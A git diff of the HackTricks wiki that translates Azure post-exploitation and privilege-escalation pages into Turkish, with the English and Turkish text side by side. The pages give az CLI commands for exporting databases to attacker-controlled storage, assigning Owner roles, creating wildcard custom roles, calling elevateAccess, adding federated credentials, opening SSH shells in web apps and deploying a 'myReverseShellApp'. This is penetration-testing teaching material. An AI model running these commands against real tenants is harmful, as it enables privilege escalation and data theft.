An attacker with permissions to create or modify topics (to modiffy the topic you will also need the Action:`Microsoft.ServiceBus/namespaces/topics/read`) within an Azure Service Bus namespace can exploit this to disrupt message workflows, expose sensitive data, or enable unauthorized actions. Using commands like az servicebus topic update, they can manipulate configurations such as enabling partitioning for scalability misuse, altering TTL settings to retain or discard messages improperly, or disabling duplicate detection to bypass controls. Additionally, they could adjust topic size limits, change status to disrupt availability, or configure express topics to temporarily store intercepted messages, making topic management a critical focus for post-exploitation mitigation.
Azure Service Bus ad alanında konuları oluşturma veya değiştirme izinlerine sahip bir saldırgan, mesaj iş akışlarını kesintiye uğratmak, hassas verileri açığa çıkarmak veya yetkisiz eylemleri etkinleştirmek için bunu istismar edebilir. az servicebus topic update gibi komutlar kullanarak, ölçeklenebilirlik kötüye kullanımı için bölümlendirmeyi etkinleştirme, mesajları yanlış bir şekilde saklamak veya atmak için TTL ayarlarını değiştirme veya kontrolleri atlatmak için tekrar eden tespiti devre dışı bırakma gibi yapılandırmaları manipüle edebilirler. Ayrıca, konu boyut sınırlarını ayarlayabilir, durumu değiştirerek kullanılabilirliği kesintiye uğratabilir veya yakalanan mesajları geçici olarak depolamak için hızlı konuları yapılandırabilirler; bu da konu yönetimini post-exploitation azaltma için kritik bir odak haline getirir.
```bash
az servicebus topic create --resource-group <ResourceGroupName> --namespace-name <NamespaceName> --name <TopicName>
az servicebus topic update --resource-group <ResourceGroupName> --namespace-name <NamespaceName> --name <TopicName>
```
### Actions: `Microsoft.ServiceBus/namespaces/topics/subscriptions/write` (`Microsoft.ServiceBus/namespaces/topics/subscriptions/read`)
An attacker with permissions to create or modify subscriptions (to modiffy the subscription you will also need the Action: `Microsoft.ServiceBus/namespaces/topics/subscriptions/read`) within an Azure Service Bus topic can exploit this to intercept, reroute, or disrupt message workflows. Using commands like az servicebus topic subscription update, they can manipulate configurations such as enabling dead lettering to divert messages, forwarding messages to unauthorized endpoints, or modifying TTL and lock duration to retain or interfere with message delivery. Additionally, they can alter status or max delivery count settings to disrupt operations or evade detection, making subscription control a critical aspect of post-exploitation scenarios.
Bir Azure Service Bus konusundaki abonelikleri oluşturma veya değiştirme izinlerine sahip bir saldırgan, mesaj iş akışlarını kesmek, yönlendirmek veya bozmak için bunu kullanabilir. az servicebus topic subscription update gibi komutlar kullanarak, mesajları saptırmak için ölü mektup özelliğini etkinleştirme, mesajları yetkisiz uç noktalara yönlendirme veya mesaj teslimatını sürdürmek veya müdahale etmek için TTL ve kilit süresini değiştirme gibi yapılandırmaları manipüle edebilirler. Ayrıca, operasyonları bozmak veya tespiti atlatmak için durum veya maksimum teslimat sayısı ayarlarını değiştirebilirler; bu da abonelik kontrolünü post-exploitation senaryolarının kritik bir yönü haline getirir.
```bash
az servicebus topic subscription create --resource-group <ResourceGroupName> --namespace-name <NamespaceName> --topic-name <TopicName> --name <SubscriptionName>
az servicebus topic subscription update --resource-group <ResourceGroupName> --namespace-name <NamespaceName> --topic-name <TopicName> --name <SubscriptionName>
```
### Eylemler: `AuthorizationRules` Mesaj Gönderme ve Alma
### Actions: `AuthorizationRules` Send & Recive Messages
Take a look here:
Buraya bir göz atın:
{{#ref}}
../az-privilege-escalation/az-queue-privesc.md
{{#endref}}
## References
## Referanslar
- https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues
- https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api
@@ -97,7 +81,3 @@ Take a look here:
- https://learn.microsoft.com/en-us/cli/azure/servicebus/queue?view=azure-cli-latest
{{#include ../../../banners/hacktricks-training.md}}

84
src/pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.md
View File

@@ -1,10 +1,10 @@
# Az - SQL Database Post Exploitation
# Az - SQL Veritabanı Sonrası Sömürü
{{#include ../../../banners/hacktricks-training.md}}
## SQL Database Post Exploitation
## SQL Veritabanı Sonrası Sömürü
For more information about SQL Database check:
SQL Veritabanı hakkında daha fazla bilgi için kontrol edin:
{{#ref}}
../az-services/az-sql.md
@@ -12,8 +12,7 @@ For more information about SQL Database check:
### "Microsoft.Sql/servers/databases/read", "Microsoft.Sql/servers/read" && "Microsoft.Sql/servers/databases/write"
With these permissions, an attacker can create and update databases within the compromised environment. This post-exploitation activity could allow an attacker to add malicious data, modify database configurations, or insert backdoors for further persistence, potentially disrupting operations or enabling additional malicious actions.
Bu izinlerle, bir saldırgan, ele geçirilmiş ortamda veritabanları oluşturabilir ve güncelleyebilir. Bu sonrası sömürü etkinliği, bir saldırgana kötü niyetli veriler ekleme, veritabanı yapılandırmalarını değiştirme veya daha fazla kalıcılık için arka kapılar ekleme imkanı verebilir, bu da operasyonları kesintiye uğratabilir veya ek kötü niyetli eylemleri mümkün kılabilir.
```bash
# Create Database
az sql db create --resource-group <resource-group> --server <server-name> --name <new-database-name>
@@ -21,73 +20,63 @@ az sql db create --resource-group <resource-group> --server <server-name> --name
# Update Database
az sql db update --resource-group <resource-group> --server <server-name> --name <database-name> --max-size <max-size-in-bytes>
```
### "Microsoft.Sql/servers/elasticPools/write" && "Microsoft.Sql/servers/elasticPools/read"
With these permissions, an attacker can create and update elasticPools within the compromised environment. This post-exploitation activity could allow an attacker to add malicious data, modify database configurations, or insert backdoors for further persistence, potentially disrupting operations or enabling additional malicious actions.
Bu izinlerle, bir saldırgan ele geçirilmiş ortamda elasticPools oluşturabilir ve güncelleyebilir. Bu post-exploitation aktivitesi, bir saldırgana kötü niyetli veriler ekleme, veritabanı yapılandırmalarını değiştirme veya daha fazla kalıcılık için arka kapılar ekleme imkanı verebilir, bu da operasyonları kesintiye uğratabilir veya ek kötü niyetli eylemleri mümkün kılabilir.
```bash
# Create Elastic Pool
az sql elastic-pool create \
--name <new-elastic-pool-name> \
--server <server-name> \
--resource-group <resource-group> \
--edition <edition> \
--dtu <dtu-value>
--name <new-elastic-pool-name> \
--server <server-name> \
--resource-group <resource-group> \
--edition <edition> \
--dtu <dtu-value>
# Update Elastic Pool
az sql elastic-pool update \
--name <elastic-pool-name> \
--server <server-name> \
--resource-group <resource-group> \
--dtu <new-dtu-value> \
--tags <key=value>
--name <elastic-pool-name> \
--server <server-name> \
--resource-group <resource-group> \
--dtu <new-dtu-value> \
--tags <key=value>
```
### "Microsoft.Sql/servers/auditingSettings/read" && "Microsoft.Sql/servers/auditingSettings/write"
With this permission, you can modify or enable auditing settings on an Azure SQL Server. This could allow an attacker or authorized user to manipulate audit configurations, potentially covering tracks or redirecting audit logs to a location under their control. This can hinder security monitoring or enable it to keep track of the actions. NOTE: To enable auditing for an Azure SQL Server using Blob Storage, you must attach a storage account where the audit logs can be saved.
Bu izinle, bir Azure SQL Sunucusu üzerindeki denetim ayarlarını değiştirebilir veya etkinleştirebilirsiniz. Bu, bir saldırganın veya yetkili bir kullanıcının denetim yapılandırmalarını manipüle etmesine olanak tanıyabilir, bu da izleri örtbas etme veya denetim günlüklerini kontrolü altındaki bir konuma yönlendirme potansiyeline sahiptir. Bu, güvenlik izlemeyi engelleyebilir veya eylemleri takip etmesine olanak tanıyabilir. NOT: Azure SQL Sunucusu için Blob Depolama kullanarak denetimi etkinleştirmek için, denetim günlüklerinin kaydedilebileceği bir depolama hesabı eklemelisiniz.
```bash
az sql server audit-policy update \
--server <server_name> \
--resource-group <resource_group_name> \
--state Enabled \
--storage-account <storage_account_name> \
--retention-days 7
--server <server_name> \
--resource-group <resource_group_name> \
--state Enabled \
--storage-account <storage_account_name> \
--retention-days 7
```
### "Microsoft.Sql/locations/connectionPoliciesAzureAsyncOperation/read", "Microsoft.Sql/servers/connectionPolicies/read" && "Microsoft.Sql/servers/connectionPolicies/write"
With this permission, you can modify the connection policies of an Azure SQL Server. This capability can be exploited to enable or change server-level connection settings
Bu izinle, bir Azure SQL Server'ın bağlantı politikalarını değiştirebilirsiniz. Bu yetenek, sunucu düzeyindeki bağlantı ayarlarını etkinleştirmek veya değiştirmek için kullanılabilir.
```bash
az sql server connection-policy update \
--server <server_name> \
--resource-group <resource_group_name> \
--connection-type <Proxy|Redirect|Default>
--server <server_name> \
--resource-group <resource_group_name> \
--connection-type <Proxy|Redirect|Default>
```
### "Microsoft.Sql/servers/databases/export/action"
With this permission, you can export a database from an Azure SQL Server to a storage account. An attacker or authorized user with this permission can exfiltrate sensitive data from the database by exporting it to a location they control, posing a significant data breach risk. It is important to know the storage key to be able to perform this.
Bu izinle, bir Azure SQL Sunucusundan bir veritabanını bir depolama hesabına dışa aktarabilirsiniz. Bu izne sahip bir saldırgan veya yetkili kullanıcı, veritabanından hassas verileri kontrol ettikleri bir konuma dışa aktararak veri sızıntısı riski oluşturabilir. Bunu gerçekleştirebilmek için depolama anahtarını bilmek önemlidir.
```bash
az sql db export \
--server <server_name> \
--resource-group <resource_group_name> \
--name <database_name> \
--storage-uri <storage_blob_uri> \
--storage-key-type SharedAccessKey \
--admin-user <admin_username> \
--admin-password <admin_password>
--server <server_name> \
--resource-group <resource_group_name> \
--name <database_name> \
--storage-uri <storage_blob_uri> \
--storage-key-type SharedAccessKey \
--admin-user <admin_username> \
--admin-password <admin_password>
```
### "Microsoft.Sql/servers/databases/import/action"
With this permission, you can import a database into an Azure SQL Server. An attacker or authorized user with this permission can potentially upload malicious or manipulated databases. This can lead to gaining control over sensitive data or by embedding harmful scripts or triggers within the imported database. Additionaly you can import it to your own server in azure. Note: The server must allow Azure services and resources to access the server.
Bu izinle, bir veritabanını Azure SQL Sunucusuna içe aktarabilirsiniz. Bu izne sahip bir saldırgan veya yetkili kullanıcı, potansiyel olarak kötü niyetli veya manipüle edilmiş veritabanları yükleyebilir. Bu, hassas verilere erişim sağlamak veya içe aktarılan veritabanına zararlı betikler veya tetikleyiciler yerleştirmekle sonuçlanabilir. Ayrıca, bunu kendi sunucunuza Azure'da içe aktarabilirsiniz. Not: Sunucu, Azure hizmetlerinin ve kaynaklarının sunucuya erişmesine izin vermelidir.
```bash
az sql db import --admin-user <admin-user> \
--admin-password <admin-password> \
@@ -98,9 +87,4 @@ az sql db import --admin-user <admin-user> \
--storage-key <storage-account-key> \
--storage-uri "https://<storage-account-name>.blob.core.windows.net/bacpac-container/MyDatabase.bacpac"
```
{{#include ../../../banners/hacktricks-training.md}}

54
src/pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md
View File

@@ -4,7 +4,7 @@
## Table Storage Post Exploitation
For more information about table storage check:
Table storage hakkında daha fazla bilgi için kontrol edin:
{{#ref}}
../az-services/az-table-storage.md
@@ -12,57 +12,49 @@ For more information about table storage check:
### Microsoft.Storage/storageAccounts/tableServices/tables/entities/read
A principal with this permission will be able to **list** the tables inside a table storage and **read the info** which might contain **sensitive information**.
Bu izne sahip bir yetkili, bir tablo depolama içindeki tabloları **listeleyebilir** ve **hassas bilgileri** içerebilecek **bilgileri okuyabilir**.
```bash
# List tables
az storage table list --auth-mode login --account-name <name>
# Read table (top 10)
az storage entity query \
--account-name <name> \
--table-name <t-name> \
--auth-mode login \
--top 10
--account-name <name> \
--table-name <t-name> \
--auth-mode login \
--top 10
```
### Microsoft.Storage/storageAccounts/tableServices/tables/entities/write | Microsoft.Storage/storageAccounts/tableServices/tables/entities/add/action | Microsoft.Storage/storageAccounts/tableServices/tables/entities/update/action
A principal with this permission will be able to **write and overwrite entries in tables** which might allow him to cause some damage or even escalate privileges (e.g. overwrite some trusted data that could abuse some injection vulnerability in the app using it).
- The permission `Microsoft.Storage/storageAccounts/tableServices/tables/entities/write` allows all the actions.
- The permission `Microsoft.Storage/storageAccounts/tableServices/tables/entities/add/action` allows to **add** entries
- The permission `Microsoft.Storage/storageAccounts/tableServices/tables/entities/update/action` allows to **update** existing entries
Bu izne sahip bir kullanıcı, **tablolar içinde girişleri yazma ve üzerine yazma** yeteneğine sahip olacak, bu da ona bazı zararlar verme veya hatta ayrıcalıkları artırma imkanı verebilir (örneğin, bunu kullanan uygulamadaki bazı enjeksiyon zafiyetlerini kötüye kullanabilecek güvenilir verileri üzerine yazmak).
- `Microsoft.Storage/storageAccounts/tableServices/tables/entities/write` izni tüm eylemlere izin verir.
- `Microsoft.Storage/storageAccounts/tableServices/tables/entities/add/action` izni **giriş eklemeye** izin verir.
- `Microsoft.Storage/storageAccounts/tableServices/tables/entities/update/action` izni mevcut girişleri **güncellemeye** izin verir.
```bash
# Add
az storage entity insert \
--account-name <acc-name> \
--table-name <t-name> \
--auth-mode login \
--entity PartitionKey=HR RowKey=12345 Name="John Doe" Age=30 Title="Manager"
--account-name <acc-name> \
--table-name <t-name> \
--auth-mode login \
--entity PartitionKey=HR RowKey=12345 Name="John Doe" Age=30 Title="Manager"
# Replace
az storage entity replace \
--account-name <acc-name> \
--table-name <t-name> \
--auth-mode login \
--entity PartitionKey=HR RowKey=12345 Name="John Doe" Age=30 Title="Manager"
--account-name <acc-name> \
--table-name <t-name> \
--auth-mode login \
--entity PartitionKey=HR RowKey=12345 Name="John Doe" Age=30 Title="Manager"
# Update
az storage entity merge \
--account-name <acc-name> \
--table-name <t-name> \
--auth-mode login \
--entity PartitionKey=HR RowKey=12345 Name="John Doe" Age=30 Title="Manager"
--account-name <acc-name> \
--table-name <t-name> \
--auth-mode login \
--entity PartitionKey=HR RowKey=12345 Name="John Doe" Age=30 Title="Manager"
```
### \*/delete
This would allow to delete file inside the shared filesystem which might **interrupt some services** or make the client **lose valuable information**.
Bu, paylaşılan dosya sistemindeki dosyaları silmeye izin verebilir, bu da **bazı hizmetleri kesintiye uğratabilir** veya müşterinin **değerli bilgileri kaybetmesine** neden olabilir.
{{#include ../../../banners/hacktricks-training.md}}

168
src/pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md
View File

@@ -4,94 +4,81 @@
## VMs & Network
For more info about Azure VMs and networking check the following page:
Azure VMs ve ağlar hakkında daha fazla bilgi için aşağıdaki sayfayı kontrol edin:
{{#ref}}
../az-services/vms/
{{#endref}}
### VM Application Pivoting
### VM Uygulama Pivotlama
VM applications can be shared with other subscriptions and tenants. If an application is being shared it's probably because it's being used. So if the attacker manages to **compromise the application and uploads a backdoored** version it might be possible that it will be **executed in another tenant or subscription**.
VM uygulamaları diğer abonelikler ve kiracılar ile paylaşılabilir. Bir uygulama paylaşılıyorsa, muhtemelen kullanıldığı içindir. Bu nedenle, saldırgan **uygulamayı ele geçirip arka kapılı** bir versiyonunu yüklemeyi başarırsa, bu versiyonun **başka bir kiracı veya abonelikte çalıştırılması** mümkün olabilir.
### Sensitive information in images
### Görsellerdeki hassas bilgiler
It might be possible to find **sensitive information inside images** taken from VMs in the past.
1. **List images** from galleries
Geçmişteki VMs'den alınan **görsellerin içinde hassas bilgiler** bulmak mümkün olabilir.
1. **Galeri**'lerden görselleri listele
```bash
# Get galleries
az sig list -o table
# List images inside gallery
az sig image-definition list \
--resource-group <RESOURCE_GROUP> \
--gallery-name <GALLERY_NAME> \
-o table
--resource-group <RESOURCE_GROUP> \
--gallery-name <GALLERY_NAME> \
-o table
# Get images versions
az sig image-version list \
--resource-group <RESOURCE_GROUP> \
--gallery-name <GALLERY_NAME> \
--gallery-image-definition <IMAGE_DEFINITION> \
-o table
--resource-group <RESOURCE_GROUP> \
--gallery-name <GALLERY_NAME> \
--gallery-image-definition <IMAGE_DEFINITION> \
-o table
```
2. **List custom images**
2. **Özel görüntüleri listele**
```bash
az image list -o table
```
3. **Create VM from image ID** and search for sensitive info inside of it
3. **Görüntü ID'sinden VM oluşturun** ve içinde hassas bilgileri arayın
```bash
# Create VM from image
az vm create \
--resource-group <RESOURCE_GROUP> \
--name <VM_NAME> \
--image /subscriptions/<SUBSCRIPTION_ID>/resourceGroups/<RESOURCE_GROUP>/providers/Microsoft.Compute/galleries/<GALLERY_NAME>/images/<IMAGE_DEFINITION>/versions/<IMAGE_VERSION> \
--admin-username <ADMIN_USERNAME> \
--generate-ssh-keys
--resource-group <RESOURCE_GROUP> \
--name <VM_NAME> \
--image /subscriptions/<SUBSCRIPTION_ID>/resourceGroups/<RESOURCE_GROUP>/providers/Microsoft.Compute/galleries/<GALLERY_NAME>/images/<IMAGE_DEFINITION>/versions/<IMAGE_VERSION> \
--admin-username <ADMIN_USERNAME> \
--generate-ssh-keys
```
### Restore noktalarında hassas bilgiler
### Sensitive information in restore points
It might be possible to find **sensitive information inside restore points**.
1. **List restore points**
**Restore noktalarında hassas bilgilerin** bulunması mümkün olabilir.
1. **Restore noktalarını listele**
```bash
az restore-point list \
--resource-group <RESOURCE_GROUP> \
--restore-point-collection-name <COLLECTION_NAME> \
-o table
--resource-group <RESOURCE_GROUP> \
--restore-point-collection-name <COLLECTION_NAME> \
-o table
```
2. **Create a disk** from a restore point
2. **Bir disk oluşturun** bir geri yükleme noktasından
```bash
az disk create \
--resource-group <RESOURCE_GROUP> \
--name <NEW_DISK_NAME> \
--source /subscriptions/<SUBSCRIPTION_ID>/resourceGroups/<RESOURCE_GROUP>/providers/Microsoft.Compute/restorePointCollections/<COLLECTION_NAME>/restorePoints/<RESTORE_POINT_NAME>
--resource-group <RESOURCE_GROUP> \
--name <NEW_DISK_NAME> \
--source /subscriptions/<SUBSCRIPTION_ID>/resourceGroups/<RESOURCE_GROUP>/providers/Microsoft.Compute/restorePointCollections/<COLLECTION_NAME>/restorePoints/<RESTORE_POINT_NAME>
```
3. **Attach the disk to a VM** (the attacker needs to have compromised a VM inside the account already)
3. **Bir diski bir VM'ye ekle** (saldırganın zaten hesap içindeki bir VM'yi ele geçirmiş olması gerekir)
```bash
az vm disk attach \
--resource-group <RESOURCE_GROUP> \
--vm-name <VM_NAME> \
--name <DISK_NAME>
--resource-group <RESOURCE_GROUP> \
--vm-name <VM_NAME> \
--name <DISK_NAME>
```
4. **Mount** the disk and **search for sensitive info**
4. **Disk'i bağlayın** ve **hassas bilgileri arayın**
{{#tabs }}
{{#tab name="Linux" }}
```bash
# List all available disks
sudo fdisk -l
@@ -103,83 +90,70 @@ sudo file -s /dev/sdX
sudo mkdir /mnt/mydisk
sudo mount /dev/sdX1 /mnt/mydisk
```
{{#endtab }}
{{#tab name="Windows" }}
#### **1. Open Disk Management**
#### **1. Disk Yönetimini Açın**
1. Right-click **Start** and select **Disk Management**.
2. The attached disk should appear as **Offline** or **Unallocated**.
1. **Başlat**'a sağ tıklayın ve **Disk Yönetimi**'ni seçin.
2. Bağlı disk **Çevrimdışı** veya **Ayrılmamış** olarak görünmelidir.
#### **2. Bring the Disk Online**
#### **2. Diski Çevrimiçi Yapın**
1. Locate the disk in the bottom pane.
2. Right-click the disk (e.g., **Disk 1**) and select **Online**.
1. Alt pencerede diski bulun.
2. Diske sağ tıklayın (örneğin, **Disk 1**) ve **Çevrimiçi**'yi seçin.
#### **3. Initialize the Disk**
#### **3. Diski Başlatın**
1. If the disk is not initialized, right-click and select **Initialize Disk**.
2. Choose the partition style:
- **MBR** (Master Boot Record) or **GPT** (GUID Partition Table). GPT is recommended for modern systems.
1. Disk başlatılmamışsa, sağ tıklayın ve **Diski Başlat**'ı seçin.
2. Bölüm stilini seçin:
- **MBR** (Master Boot Record) veya **GPT** (GUID Partition Table). Modern sistemler için GPT önerilir.
#### **4. Create a New Volume**
#### **4. Yeni Bir Birim Oluşturun**
1. Right-click the unallocated space on the disk and select **New Simple Volume**.
2. Follow the wizard to:
- Assign a drive letter (e.g., `D:`).
- Format the disk (choose NTFS for most cases).
{{#endtab }}
{{#endtabs }}
1. Diskteki ayrılmamış alana sağ tıklayın ve **Yeni Basit Birim**'i seçin.
2. Sihirbazı takip edin:
- Bir sürücü harfi atayın (örneğin, `D:`).
- Diski biçimlendirin (çoğu durumda NTFS seçin).
{{#endtab }}
{{#endtabs }}
### Sensitive information in disks & snapshots
### Disklerde ve anlık görüntülerde hassas bilgiler
It might be possible to find **sensitive information inside disks or even old disk's snapshots**.
1. **List snapshots**
**Disklerde veya hatta eski disk anlık görüntülerinde hassas bilgilerin bulunması mümkün olabilir**.
1. **Anlık görüntüleri listeleyin**
```bash
az snapshot list \
--resource-group <RESOURCE_GROUP> \
-o table
--resource-group <RESOURCE_GROUP> \
-o table
```
2. **Create disk from snapshot** (if needed)
2. **Anlık görüntüden disk oluştur** (gerekirse)
```bash
az disk create \
--resource-group <RESOURCE_GROUP> \
--name <DISK_NAME> \
--source <SNAPSHOT_ID> \
--size-gb <DISK_SIZE>
--resource-group <RESOURCE_GROUP> \
--name <DISK_NAME> \
--source <SNAPSHOT_ID> \
--size-gb <DISK_SIZE>
```
3. **Bir diski bir VM'ye ekleyin ve bağlayın** ve hassas bilgileri arayın (bunu nasıl yapacağınızı görmek için önceki bölüme bakın)
3. **Attach and mount the disk** to a VM and search for sensitive information (check the previous section to see how to do this)
### VM Uzantıları ve VM Uygulamalarında Hassas Bilgiler
### Sensitive information in VM Extensions & VM Applications
It might be possible to find **sensitive information inside VM extensions and VM applications**.
1. **List all VM apps**
**VM uzantıları ve VM uygulamaları içinde hassas bilgilerin** bulunması mümkün olabilir.
1. **Tüm VM uygulamalarını listeleyin**
```bash
## List all VM applications inside a gallery
az sig gallery-application list --gallery-name <gallery-name> --resource-group <res-group> --output table
```
2. Install the extension in a VM and **search for sensitive info**
2. Bir VM'de uzantıyı yükleyin ve **hassas bilgileri arayın**
```bash
az vm application set \
--resource-group <rsc-group> \
--name <vm-name> \
--app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellApp/versions/1.0.2 \
--treat-deployment-as-failure true
--resource-group <rsc-group> \
--name <vm-name> \
--app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellApp/versions/1.0.2 \
--treat-deployment-as-failure true
```
{{#include ../../../banners/hacktricks-training.md}}

7
src/pentesting-cloud/azure-security/az-privilege-escalation/README.md
View File

@@ -1,6 +1 @@
# Az - Privilege Escalation
# Az - Yetki Yükseltme

16
src/pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md
View File

@@ -4,7 +4,7 @@
## App Services
For more information about Azure App services check:
Azure App hizmetleri hakkında daha fazla bilgi için kontrol edin:
{{#ref}}
../az-services/az-app-service.md
@@ -12,17 +12,14 @@ For more information about Azure App services check:
### Microsoft.Web/sites/publish/Action, Microsoft.Web/sites/basicPublishingCredentialsPolicies/read, Microsoft.Web/sites/config/read, Microsoft.Web/sites/read,&#x20;
These permissions allows to call the following commands to get a **SSH shell** inside a web app
- Direct option:
Bu izinler, bir web uygulaması içinde **SSH shell** almak için aşağıdaki komutları çağırmaya olanak tanır
- Doğrudan seçenek:
```bash
# Direct option
az webapp ssh --name <name> --resource-group <res-group>
```
- Create tunnel and then connect to SSH:
- Tünel oluşturun ve ardından SSH'ye bağlanın:
```bash
az webapp create-remote-connection --name <name> --resource-group <res-group>
@@ -35,9 +32,4 @@ az webapp create-remote-connection --name <name> --resource-group <res-group>
## So from that machine ssh into that port (you might need generate a new ssh session to the jump host)
ssh root@127.0.0.1 -p 39895
```
{{#include ../../../banners/hacktricks-training.md}}

60
src/pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md
View File

@@ -4,7 +4,7 @@
## Azure IAM
Fore more information check:
Daha fazla bilgi için kontrol edin:
{{#ref}}
../az-services/az-azuread.md
@@ -12,45 +12,38 @@ Fore more information check:
### Microsoft.Authorization/roleAssignments/write
This permission allows to assign roles to principals over a specific scope, allowing an attacker to escalate privileges by assigning himself a more privileged role:
Bu izin, belirli bir kapsamda ilkelere roller atamaya olanak tanır ve bir saldırganın kendisine daha yetkili bir rol atayarak ayrıcalıkları artırmasına olanak tanır:
```bash
# Example
az role assignment create --role Owner --assignee "24efe8cf-c59e-45c2-a5c7-c7e552a07170" --scope "/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.KeyVault/vaults/testing-1231234"
```
### Microsoft.Authorization/roleDefinitions/Write
This permission allows to modify the permissions granted by a role, allowing an attacker to escalate privileges by granting more permissions to a role he has assigned.
Create the file `role.json` with the following **content**:
Bu izin, bir rol tarafından verilen izinleri değiştirmeye olanak tanır ve bir saldırganın atadığı bir role daha fazla izin vererek ayrıcalıkları artırmasına olanak tanır.
Aşağıdaki **içerikle** `role.json` dosyasını oluşturun:
```json
{
"Name": "<name of the role>",
"IsCustom": true,
"Description": "Custom role with elevated privileges",
"Actions": ["*"],
"NotActions": [],
"DataActions": ["*"],
"NotDataActions": [],
"AssignableScopes": ["/subscriptions/<subscription-id>"]
"Name": "<name of the role>",
"IsCustom": true,
"Description": "Custom role with elevated privileges",
"Actions": ["*"],
"NotActions": [],
"DataActions": ["*"],
"NotDataActions": [],
"AssignableScopes": ["/subscriptions/<subscription-id>"]
}
```
Then update the role permissions with the previous definition calling:
Sonra, önceki tanımı çağırarak rol izinlerini güncelleyin:
```bash
az role definition update --role-definition role.json
```
### Microsoft.Authorization/elevateAccess/action
This permissions allows to elevate privileges and be able to assign permissions to any principal to Azure resources. It's meant to be given to Entra ID Global Administrators so they can also manage permissions over Azure resources.
Bu izin, ayrıcalıkları yükseltmeye ve Azure kaynaklarına herhangi bir ilkeye izin atamaya olanak tanır. Bu, Entra ID Küresel Yöneticilerine verilmesi amaçlanmıştır, böylece Azure kaynakları üzerindeki izinleri de yönetebilirler.
> [!TIP]
> I think the user need to be Global Administrator in Entrad ID for the elevate call to work.
> Yükseltme çağrısının çalışması için kullanıcının Entra ID'de Küresel Yönetici olması gerektiğini düşünüyorum.
```bash
# Call elevate
az rest --method POST --uri "https://management.azure.com/providers/Microsoft.Authorization/elevateAccess?api-version=2016-07-01"
@@ -58,29 +51,22 @@ az rest --method POST --uri "https://management.azure.com/providers/Microsoft.Au
# Grant a user the Owner role
az role assignment create --assignee "<obeject-id>" --role "Owner" --scope "/"
```
### Microsoft.ManagedIdentity/userAssignedIdentities/federatedIdentityCredentials/write
This permission allows to add Federated credentials to managed identities. E.g. give access to Github Actions in a repo to a managed identity. Then, it allows to **access any user defined managed identity**.
Example command to give access to a repo in Github to the a managed identity:
Bu izin, yönetilen kimliklere Federated kimlik bilgileri eklemeye olanak tanır. Örneğin, bir depodaki Github Actions'a bir yönetilen kimliğe erişim vermek. Ardından, **herhangi bir kullanıcı tanımlı yönetilen kimliğe** erişim sağlar.
Yönetilen bir kimliğe Github'daki bir depoya erişim vermek için örnek komut:
```bash
# Generic example:
az rest --method PUT \
--uri "https://management.azure.com//subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<managed-identity-name>/federatedIdentityCredentials/<name-new-federated-creds>?api-version=2023-01-31" \
--headers "Content-Type=application/json" \
--body '{"properties":{"issuer":"https://token.actions.githubusercontent.com","subject":"repo:<org-name>/<repo-name>:ref:refs/heads/<branch-name>","audiences":["api://AzureADTokenExchange"]}}'
--uri "https://management.azure.com//subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<managed-identity-name>/federatedIdentityCredentials/<name-new-federated-creds>?api-version=2023-01-31" \
--headers "Content-Type=application/json" \
--body '{"properties":{"issuer":"https://token.actions.githubusercontent.com","subject":"repo:<org-name>/<repo-name>:ref:refs/heads/<branch-name>","audiences":["api://AzureADTokenExchange"]}}'
# Example with specific data:
az rest --method PUT \
--uri "https://management.azure.com//subscriptions/92913047-10a6-2376-82a4-6f04b2d03798/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/funcGithub-id-913c/federatedIdentityCredentials/CustomGH2?api-version=2023-01-31" \
--headers "Content-Type=application/json" \
--body '{"properties":{"issuer":"https://token.actions.githubusercontent.com","subject":"repo:carlospolop/azure_func4:ref:refs/heads/main","audiences":["api://AzureADTokenExchange"]}}'
--uri "https://management.azure.com//subscriptions/92913047-10a6-2376-82a4-6f04b2d03798/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/funcGithub-id-913c/federatedIdentityCredentials/CustomGH2?api-version=2023-01-31" \
--headers "Content-Type=application/json" \
--body '{"properties":{"issuer":"https://token.actions.githubusercontent.com","subject":"repo:carlospolop/azure_func4:ref:refs/heads/main","audiences":["api://AzureADTokenExchange"]}}'
```
{{#include ../../../banners/hacktricks-training.md}}

240
src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md
View File

@@ -3,80 +3,71 @@
{{#include ../../../../banners/hacktricks-training.md}}
> [!NOTE]
> Note that **not all the granular permissions** built-in roles have in Entra ID **are elegible to be used in custom roles.**
> **Entra ID'deki** yerleşik rollerin **tüm ayrıntılı izinleri** özel roller için **kullanılabilir değildir.**
## Roles
## Roller
### Role: Privileged Role Administrator <a href="#c9d4cde0-7dcc-45d5-aa95-59d198ae84b2" id="c9d4cde0-7dcc-45d5-aa95-59d198ae84b2"></a>
### Rol: Ayrıcalıklı Rol Yöneticisi <a href="#c9d4cde0-7dcc-45d5-aa95-59d198ae84b2" id="c9d4cde0-7dcc-45d5-aa95-59d198ae84b2"></a>
This role contains the necessary granular permissions to be able to assign roles to principals and to give more permissions to roles. Both actions could be abused to escalate privileges.
- Assign role to a user:
Bu rol, rolleri ilkelere atamak ve rollere daha fazla izin vermek için gerekli ayrıntılı izinleri içerir. Her iki eylem de ayrıcalıkları artırmak için kötüye kullanılabilir.
- Bir kullanıcıya rol atama:
```bash
# List enabled built-in roles
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/directoryRoles"
--uri "https://graph.microsoft.com/v1.0/directoryRoles"
# Give role (Global Administrator?) to a user
roleId="<roleId>"
userId="<userId>"
az rest --method POST \
